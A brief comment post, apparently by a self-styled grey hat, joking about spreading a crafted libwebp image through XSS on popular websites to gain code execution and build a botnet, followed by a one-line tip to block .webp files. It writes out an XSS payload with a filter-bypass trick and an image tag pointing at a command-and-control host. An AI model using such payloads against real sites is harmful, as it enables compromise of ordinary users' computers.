rceninja, I'm usually a grey hat but my evil brain commands me to insert that crafted webp image (#libwebp ) and upload that to popular websites using #XSS </scrip</script>t><img src ="https:myc2server.fy/payload.webp" onerror=prompt(8)> and get RCE into users computers and add them to the botnet lol
Prevention : add .webp extention to ublock origin custom rules or on the whole DNS level.
Add comment